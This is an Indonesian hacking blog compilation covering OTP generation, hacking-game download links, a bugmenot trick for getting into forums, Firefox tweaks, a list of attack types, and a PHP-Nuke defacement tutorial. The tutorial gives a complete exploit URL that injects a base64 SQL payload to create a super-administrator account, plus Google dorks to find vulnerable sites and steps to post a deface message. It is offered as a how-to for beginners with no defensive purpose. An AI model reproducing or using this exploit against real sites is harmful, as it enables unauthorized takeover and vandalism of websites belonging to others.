    Saya akan jelaskan mulai dari pembangkitan OTP dalam mode self generated atau response only. Sebelumnya tentu saja, server dan token harus menyepakati sebuah nilai awal rahasia (init-secret). Nilai awal ini disimpan (ditanam) dalam token dan disimpan juga dalam tabel di server.
    Ketika pada suatu waktu tertentu token diminta menghasilkan OTP tanpa challenge code, inilah yang dilakukan token:
    1. Mengambil waktu saat ini dalam detik berformat EPOCH (jumlah detik sejak 1 Januari 1970), biasanya dalam granularity 10 detik, sehingga nilai EPOCH dibagi 10.
    2. Menggabungkan init-secret dengan waktu saat ini dari langkah 1.
    3. Menghitung nilai hash gabungan init-secret dan waktu dari langkah 2.
    Nilai hash dari langkah 3 inilah yang menjadi OTP. Namun biasanya OTP diambil dari beberapa karakter/digit di awal hash.
    Bagaimana cara server melakukan otentikasi? Caranya mirip dengan yang dilakukan token, yaitu dengan menghitung nilai hash gabungan init-secret dengan waktu saat ini dan mengambil beberapa digit di awal sebagai OTP. Bila OTP yang dikirim user sama dengan OTP yang didapatkan server dari perhitungan hash, maka otentikasi berhasil.
    Namun ada sedikit catatan yang harus diperhatikan terkait waktu. Untuk memberikan toleransi perbedaan waktu antara token dan server, dan juga jeda waktu dari sejak server meminta password sampai user meminta token membangkitkan token, maka server harus memberikan toleransi waktu.
    Ada tiga kejadian yang perlu diperhatikan waktunya, yaitu:
    1. Detik ketika server meminta password (OTP) dari user
    2. Detik ketika token membangkitkan OTP
    3. Detik ketika server menerima OTP dari user
    Perhatikan contoh di bawah ini:
    Bila diasumsikan waktu di server sama persis dengan waktu di token (jam internal token), maka kita harus perhatikan bahwa pasti akan ada jeda antara kejadian 1, 2 dan 3. Bila pada detik ke-0 server meminta password dari user, karena lambatnya akses internet, bisa jadi baru pada detik ke-30 user melihat pada browsernya bahwa dia harus memasukkan OTP dari token. Kemudian baru pada detik ke-60 token menghasilkan OTP. Pada detik ke-65 user mensubmit nilai OTP tersebut ke server dan baru tiba di server pada detik ke-90.
    Karena pembangkitan OTP tergantung waktu pada saat OTP dibangkitkan, maka OTP yang dihasilkan token, adalah OTP pada detik ke-60. Sedangkan server meminta password dari user sejak detik ke-0. Bagaimana cara server melakukan otentikasi? Caranya adalah dengan memeriksa seluruh kemungkinan OTP dalam rentang waktu yang dipandang memadai, misalkan 180 detik.
    Bila sistem menggunakan granularity 10 detik maka server harus menghitung nilai OTP sejak dari detik ke-0, 10, 20, 30, 40, s/d ke 180 dalam kelipatan 10 detik. Perhatikan contoh pada gambar di bawah ini. Dalam sistem ini diasumsikan OTP adalah 6 karakter awal dari MD5 gabungan. Dalam melakukan otentikasi, server harus membandingkan semua nilai OTP sejak detik ke-0 (dalam contoh ini EPOCH/10 = 124868042) hingga waktu toleransi maksimum.
    otptoken1Dalam contoh di atas bila user mengirimkan OTP “b1cdb9″ maka otentikasi akan berhasil ketika server menghitung nilai OTP pada detik ke-60 sejak server meminta OTP dari user.
    Ilustrasi di atas hanyalah contoh, pada kenyataannya ada kemungkinan waktu antara server dan token tidak sama persis 100%, sehingga server terpaksa harus memberikan toleransi waktu tidak hanya ke depan, namun juga ke belakang. Sebab bisa jadi waktu di server lebih cepat daripada waktu di token. Sebagai contoh ketika waktu di server menunjukkan EPOCH/10=124868219, bisa jadi waktu di token baru menunjukkan EPOCH/10=1248682121 (waktu token terlambat 80 detik).
    Misalkan waktu toleransi adalah 3 menit, maka server harus memberikan toleransi 3 menit ke depan dan 3 menit ke belakang relatif terhadap waktu ketika server menerima OTP dari user dan melakukan otentikasi. Ingat, waktu toleransi ini relatif terhadap waktu server melakukan otentikasi. Jadi jika server melakukan otentikasi pada EPOCH/10=600, maka server harus menghitung seluruh nilai OTP sejak EPOCH/10=420 hingga EPOCH/10=780.
    Ingat penjelasan saya tentang salt sebelumnya. Kalau dibandingkan dengan OTP ini, maka nilai init-secret adalah sejenis dengan password plain-text pengguna, sedangkan salt atau tambahannya adalah waktu (EPOCH/10).
    Umur OTP
    Sebelumnya sudah saya sebutkan bahwa sifat dari OTP adalah memiliki umur yang terbatas. Umur ini terkait dengan waktu toleransi yang diberikan server sebesar X detik ke depan dan X detik ke belakang relatif terhadap saat server melakukan otentikasi. Bila waktu toleransi adalah 3 menit (180 detik), maka umur sebuah OTP adalah 3 menit, dalam arti bila server melakukan otentikasi tidak lebih dari 3 menit sejak OTP dibangkitkan token, maka OTP tersebut akan dianggap valid oleh server.
    OTP dalam Mode Challenge/Response
    Pembangkitan dan otentikasi OTP dalam mode C/R sebenarnya mirip dengan mode self-generated. Bila dalam mode self generated tambahan (salt) dari init-secret adalah waktu (EPOCH/10), dalam mode C/R ini salt/tambahannya lebih banyak. Init-secret tidak hanya ditambah dengan waktu, namun juga ditambah lagi dengan challenge.
    Perhatikan gambar di bawah ini. Server melakukan penghitungan OTP untuk semua detik dalam waktu toleransinya.
    otptoken2
    Dalam mode C/R ada field tambahan yang harus digabungkan sebelum dihitung nilai hashnya, yaitu challenge. Nilai challenge ini diketahui oleh server dan juga oleh token (ketika user mengetikkan challenge ke token), sehingga baik token maupun server akan dapat menghitung OTP yang sama sehingga proses otentikasi dapat berlangsung.
    Source: ilmu hacking .com / arif w

    Kamis, 20 Januari 2011

    3 hacking game simulation game full


    {"Use as backup purpose only"}

    Uplink Hackers Elite:

    High tech computer crime and industrial espionage on the Internet of 2010.
    You play an Uplink Agent who makes a living by performing jobs for major corporations. Your tasks involve hacking into rival computer systems, stealing research data, sabotaging other companies, laundering money, erasing evidence, or framing innocent people.
    You use the money you earn to upgrade your computer systems, and to buy new software and tools. As your experience level increases you find more dangerous and profitable missions become available.
    Full:

    Download link(s):
    (rapidshare)
    You can speculate on a fully working stock market (and even influence its outcome). You can modify peoples academic or criminal records. You can divert money from bank transfers into your own accounts. You can even take part in the construction of the most deadly computer virus ever designed.
    Image
    Download:
    http://defensive-pro.org/downloads/uplink_hackers_elite_rs.html

    Hacker Evloution:

    The concept behind Hacker Evolution is to create a game that challenges the gamer's intelligence, attention and focus, creating a captivating mind game. Solve puzzles, examine code and bits of information, to help you achieve your objectives.
    Features:
    • Modding capability to allow the creation of custom levels
    • The included mod editor, allows you to create new game levels easily
    • Multiple interface skins
    • Complex levels and gameplay to guarantee the best experience
    • Optional freelance jobs to offer more variety
    • Complex command console with over 20 commands and tools
    Image
    Download:
    http://defensive-pro.org/downloads/hacker_evolution_rs.html

    Street Hacker:

    A crude executive and entrepreneur, Demetrius Mordecai, discovers you on the Streets of New York. He sees you as person with a strong analytical mind, a keen intuition, and a desire for power. Seeing as how your pocketbook was also empty, he recruits you as a hacker to carry out his dirty work. Vince, his chief of operations helps get you settled in and used to the game. Being as successful as he is, Demetrius has also made many enemies on the corporate level and a few of the first missions he assigns you is disrupting these companies by taking out their servers. Upon completion, Demetrius will make the unexpected decision to replace you with a better recruit by unanimously giving the FBI a lead on the individual committing these recent digital crimes. Quickly responding, the FBI surrounds your apartment building to find enough evidence to put you away for four years. Two years later after you are out of prison on parole, Vince, your mentor from the beginning, helps get you back on your feet with some cash and the only spare notebook he can find. He and many of the others still working for Demetrius, too afraid to betray him, are hoping you can unravel his secrets and have him put away for life...
    Image
    Download:
    http://defensive-pro.org/downloads/Street_Hacker_rs.html

    Please thanks/vote to encourage more like this

    Rabu, 13 Oktober 2010

    Cara mudah Login di Forum tanpa Registrasi

    Pernah gaa saat googling buat cari informasi penting ehh tiba2 ketemu di forum yang belum kita tahu dan ternyata harus daftar dulu atau login biar bisa lihat informasinya?

    pasti terasa sangat malas kalau daftar lagi,
    betull gaaa ??

    tenang aja barusan tadi saya juga merasakan itu kog, sebelum posting artikel ini tadi saya iseng2 cari ebook bertema sulap di indowebster ehhh malah ada tulisan di salah satu keterangannya 'pass di forum'.

    wahh nanti kalau saya download percuma dong nanti saya ga bisa buka filenya.
    terus menurut feeling saya wahh pasti ini pass ada di forum Indowebster (IDWS) kalau akun idws saya punya tapi kalau forumnya saya nggaa punyaa. hehehe

    jadi berfikir balik nii,
    mauu download apa gaa yaa?
    tiba2 saya ingat salah satu trik yang saya dapat dari forum biasanya ini niii http://xcode.or.id/forum2
    forum kebanggaan indonesia kaskus.us juga lohhh hehehhe

    okee deh dari pada cerita terus
    begini caranya untuk dapat akun login.

    silahkan akang2 mba2 masuk disini http://bugmenot.com

    caranya:
    silahkan masukan nama link forum di kotak input link disana
    lihat gambar
    gantikan www.example.com dengan link forum yang ingin dituju.
    jika sudah tekan get logins.
    lihat apa hasilnyaa ???


    selamat mencobaa...

    Cara mudah Melacak Nomor HP dan Kode Area

    yang mau melacak nomor spam yang sering nyangkut di HP ??
    ini dia solusinya hehehehehe
    kadang tiba2 ada sms masuk yang ga penting banget dan ga tahu siapa itu yang ngirim.

    kemarin hari teman saya sempat kena tipu dari pengirim sms penipuan yang berkedok hadiah 75juta, secara siapa yang ga tertarik? betull ngga?

    tidak lama kemudian teman saya datang dan bilang.
    ehhhh, gw dapat 75juta dari operator ini (maaf ga perlu disebut).

    langsung saya lihat nomornya dan
    memang ternyata hanya penipuan.
    saya telpon orangnya, dng lemah lembut dari kata-katanya sampai saya ga kerasa kena hipnotis hehehehehe

    langsung dehh ingat2
    salah satu tool dari Family_code (xcode)
    silahkan download dibawah ini.
    disini 

    Selasa, 12 Oktober 2010

    Print Thread Print Thread Teknik Deface dengan bug yang sudah lama

    Bingung pada mua belajar deface ? dan susah di mengerti tutor'a ?
    Oke dey gw bakal ngajarin Bugs deface yang udah lama banget buat kalian.
    Salah satu teknik daface sederhana yang sdh lawas & cucok banget buat newbie² buat belajar..

    Dengan menggunakan bug seperti :

    www.target.com/nuke/admin.php?op=AddAuthor&add_aid=Newbie&add_name=nwb&add_pwd=newbiejelek&add_email=newbie@dodol.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


    kamu dapat membuat text sederhana pada halaman depan site seperti :


    Defaced by Newbie

    Greetz to everyone at #yogyacarderlink

    Hey admin.. find your hole and close it.

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    Langkah awal buka om google ketik :

    allinurl:.com/nuke /index.php atau allinurl:.org/nuke/index.php


    Nah ..... kalo sudah ketemu site targetnya maka langkah selanjutnya adalah :

    1. www.target.com/nuke/index.php

    2. www.target.com/nuke/admin.php => index.php yg diatas tadi dirubah
    menjadi admin.php

    3. Masukkan bug nya di belakang site target misal :

    www.target.com/nuke/admin.php?op=AddAuthor&add_aid=Newbie&add_name=nwb&add_pwd=newbiejelek&add_email=newbie@dodol.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

    Kalo nggak mau berarti site tsb udah di path ama admin nya.

    Tapi kalo berhasil, maka di url/browsing kamu akan muncul :

    www.target.com/nuke/admin.php?op=mod_author

    5. Disana kamu di suruh login, masukin id & password kamu tadi. Masih ingat kan ???

    id=Newbie => liat yg diatas tadi
    password=newbiejelek => liat yg diatas tadi

    Nah . . . kamu sekarang sudah masuk ke "Administration Menu" site tsb. Berarti kamu sudah menguasai site tsb sekarang ! He.. he.. he..

    Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu input :

    title =>

    content =>
    Hey admin.......find your hole and close it..
    Greetz to everyone at #yogyacarderlink


    expiration => unlimited trus klik tab add messages yg ada dibawah

    Kalo sudah, buka url/browsing baru lalu ketikkan site target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php

    kalo nggak ada hasil deface kamu coba klik tab refresh yg ada diatas yg disamping url/browsing lo.

    Koneksi Cepat... Download Lambat......!!!

    Mozilla Firefox.. adalah salah satu browser yang paling siiipp. Kalau menurut saya Mozilla firefox adalah salah satu mesin browser yang sangat lengkap fiturnya. Nah.. saya akan memberikan sedikit trik mengenai cara mempercepat Firefox anda dalam brosing di internet dengan sedikit tweaking.. Smile

    1. Untuk mempercepat browsing :

    1. Ctrl+Enter, ini untuk membuka domain yang menggunakan .com. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.yahoo.com” jadi ketiklah “yahoo” kemudian klik ctrl+enter
    2. Shift+Enter, ini untuk membuka domain yang menggunakan .net. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.telkom.net” jadi ketiklah “telkom” kemudian klik shif+enter
    3. Ctrl+Shift+Enter, ini untuk membuka domain yang menggunakan .org. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.dikti.org” jadi ketiklah “dikti” kemudian klik Ctrl+Shift+Enter

    2. Tweeking Firefox :

    1. Ketik “about:config” di firefox anda kemudian enter
    2. Maka akan keluar sebuah settingan untuk tweaking firefox
    3. Untuk merubahnya, klik 2 kali dan masukkan data perubahannya
    4. Jika data dibawah tidak terdapat dalam settingan default firefox, klik kanan pilih New. Untuk data berupa angka, pilih Integer, untuk true/false pilih Boolean.

    - Untuk pengguna DSL :

    1. Set “network.http.pipelining : true”
    2. Set “network.http.proxy.pipelining : true”
    3. Set “network.http.pipelining.maxrequests : 64?
    4. Set “nglayout.initialpaint.delay : 0?

    - Untuk pengguna ADSL :

    1. Set “network.http.max-connections : 64?
    2. Set “network.http.max-connections-per-server : 21?
    3. Set “network.http.max-persistent-connections-per-server : 8?
    4. Set “network.http.pipelining : true”
    5. Set “network.http.pipelining.maxrequests : 100?
    6. Set “network.http.proxy.pipelining : true”
    7. Set “nglayout.initialpaint.delay : 0?

    - Untuk pengguna Dial Up

    1. Set “browser.cache.disk_cache_ssl : true”
    2. Set “browser.xul.error_pages.enabled : true”
    3. Set “network.http.max-connections : 32?
    4. Set “network.http.max-connections-per-server : 8?
    5. Set “network.http.max-persistent-connections-per-proxy : 8?
    6. Set “network.http.max-persistent-connections-per-server : 4?
    7. Set “network.http.pipelining : true”
    8. Set “network.http.pipelining.maxrequests : 8?
    9. Set “network.http.proxy.pipelining : true”
    10. Set “plugin.expose_full_path : true”
    11. Set “signed.applets.codebase_principal_support : true”
    12. Set “content.interrupt.parsing : true”
    13. Set “content.max.tokenizing.time : 3000000?
    14. Set “content.maxtextrun : 8191?
    15. Set “content.notify.backoffcount : 5?
    16. Set “content.notify.interval : 750000?
    17. Set “content.notify.ontimer : true”
    18. Set “content.switch.threshold : 750000?

    Langkah - langkahnya
    1. Pada address bar ketik about:config
    maka akan muncul file confugurasi fire fox

    2 cari file berikut :
    network.http.pipelining
    network.http.proxy.pipelining
    network.http.pipelining.maxrequests

    3. set file tersebut seperti berikut :

    network.http.pipelining menjadi true
    network.http.proxy.pipelining menjadi true

    4. Ubah nilai file berikut :
    network.http.pipelining.maxrequests menjadi 50 atau 64.

    5. buat file berikut :
    klik kanak Trus pilih new : integer. copy paste perintah ini : nglayout.initialpaint.delay beri nilai 0 (nol)

    Selamat Mencoba.... o....ya... kalau bisa downloadnya pake' progam IDM ma Orbit...!

    Crack & Keygen Site

    Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

    Sabtu, 09 Oktober 2010

    mematikan komputer 1 LAN lewat cmd

    hehehe,,,

    bosan maen brosing truss di net,,ingin jahili orang yg satu net dgn kamu......
    matikan aja komputer nya atau merestart nya...biar bingung tuh orang :D

    tdak basa basi lagi silahkan aja nonton film nya di sini

    Kamis, 07 Oktober 2010

    CARA HACKER MENJEBOL,MERUSAK WEBSITE ,DLL

    Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:

    1. IP Spoofing
    2. FTP Attack
    3. Unix Finger Exploits
    4. Flooding & Broadcasting
    5. Fragmented Packet Attacks
    6. E-mail Exploits
    7. DNS and BIND Vulnerabilities
    8. Password Attacks
    9.Proxy Server Attacks
    10. Remote Command Processing Attacks
    11. Remote File System Attack
    12. Selective Program Insertions
    13. Port Scanning
    14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
    15. HTTPD Attacks


    1. IP Spoofing

    IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.


    IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

    2. FTP Attack

    Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.

    Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.

    3. Unix Finger Exploits

    Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

    Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

    4. Flooding & Broadcasting

    Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.

    Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

    5. Fragmented Packet Attacks

    Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

    6. E-mail Exploits

    Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

    7. DNS and BIND Vulnerabilities

    Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

    8. Password Attacks

    Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

    Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.

    9.Proxy Server Attacks

    Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

    10. Remote Command Processing Attacks

    Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
    Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

    11. Remote File System Attack

    Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

    12. Selective Program Insertions

    Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.

    13. Port Scanning

    Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

    14.TCP/IP Sequence Stealing, Passive Port Listening and Packet

    Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

    15. HTTPD Attacks

    Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.

    HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.
     
    Klik689 © 2011 Templates | Nanda